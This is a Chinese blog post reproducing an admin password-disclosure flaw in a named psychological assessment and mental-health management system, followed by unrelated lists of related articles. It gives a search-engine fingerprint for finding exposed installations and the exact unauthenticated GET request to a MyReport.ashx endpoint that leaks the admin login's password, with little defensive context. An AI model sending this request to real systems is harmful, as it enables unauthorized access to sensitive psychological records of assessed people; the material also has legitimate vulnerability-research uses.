某心理健康测评系统-账号密码泄露漏洞复现

0x01 漏洞介绍

  • 《京师心智心理测评健康管理系统》由京师心智与北京师范大学心理学院联合研发,秉承精准测量的研发理念,为用户提供各种专业化的测评服务.
  • 系统主要包含人员信息管理、心理测评、危机预警、心理档案等8大核心功能,涵盖心理健康、情绪、个性、社会和学习适应性、压力状态、职业、家庭、心理能力等多方面的测量工具,能够满足广大心理健康工作者,对成员心理状况全面评估与诊断、快速筛选和及时干预的需求。

0x02 影响版本

访问接口 /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin,会显现泄露口令信息

0x03 漏洞查询

body="JS/ligerComboBox/ligerTree.js"

在这里插入图片描述

0x04 漏洞复现

第一步 获取泄漏的口令信息
GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin HTTP/1.1

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-17 23:02:04       67 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-17 23:02:04       72 阅读
  3. 在Django里面运行非项目文件

    2024-07-17 23:02:04       58 阅读
  4. Python语言-面向对象

    2024-07-17 23:02:04       69 阅读

热门阅读

  1. 刷题记录:LeetCode 925.长按键入

    2024-07-17 23:02:04       21 阅读
  2. 实际项目中JVM调优

    2024-07-17 23:02:04       17 阅读
  3. 如何做到思维的顺畅运行

    2024-07-17 23:02:04       20 阅读
  4. Linux下Supervisor的安装与配置

    2024-07-17 23:02:04       18 阅读
  5. 布儒斯特定律

    2024-07-17 23:02:04       17 阅读
  6. A const member function

    2024-07-17 23:02:04       22 阅读
  7. 代码随想录算法训练营第14天/优先掌握递归

    2024-07-17 23:02:04       24 阅读
  8. ES6函数部分和数组部分的小练习

    2024-07-17 23:02:04       20 阅读
  9. 学习笔记(数据库)1

    2024-07-17 23:02:04       17 阅读
  10. 后端实现图片上传本地,可采用url查看图片

    2024-07-17 23:02:04       22 阅读